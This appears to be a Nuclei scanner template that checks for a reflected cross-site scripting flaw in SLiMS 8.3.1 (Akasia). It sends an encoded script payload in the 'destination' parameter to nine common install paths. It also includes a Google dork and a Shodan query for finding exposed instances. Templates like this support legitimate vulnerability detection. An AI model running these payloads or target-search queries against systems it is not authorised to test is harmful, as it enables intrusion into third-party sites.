id: slims-8-akasia-xss info: name: Senayan Library Management System v8.3.1 (Akasia) - Cross-Site Scripting author: nblirwn severity: medium description: | SLiMS 8.3.1 (Akasia) has a `destination` parameter that is vulnerable to reflected XSS. However, ensure that the `p` parameter points to the 'member'. Additional google dork 'intext:"SLiMS 8.3.1 (Akasia)"'. reference: - https://github.com/slims/slims8_akasia/issues/184 metadata: verified: true max-request: 1 vendor: slims product: senayan_library_management_system shodan-query: html:"SLIMS" tags: senayan,xss,slims http: - method: GET path: - "{{BaseURL}}/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/perpustakaan/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/slims/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/perpustakaan/slims/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/e-library/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/perpus/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/digilib/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/akasia/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/library/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" stop-at-first-match: true matchers-condition: and matchers: - type: word words: - '' - 'SLiMS' condition: and - type: word part: content_type words: - "text/html" - type: status status: - 200 # digest: 4a0a004730450220620c5023788a78c57a15e53ec2bdf0cdce1523bba6ffdae89cb6f50aa0ed1a36022100817f0ae696fd8e0f84cc1d34293e59534d4e9151a1ded46e1603c2e9b6308f9e:922c64590222798bb761d5b6d8e72950